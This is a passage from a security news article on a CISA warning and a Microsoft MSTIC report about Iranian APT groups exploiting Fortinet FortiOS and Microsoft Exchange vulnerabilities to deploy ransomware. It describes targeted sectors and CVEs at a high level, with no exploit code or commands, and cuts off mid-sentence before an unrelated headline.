then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could
Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities
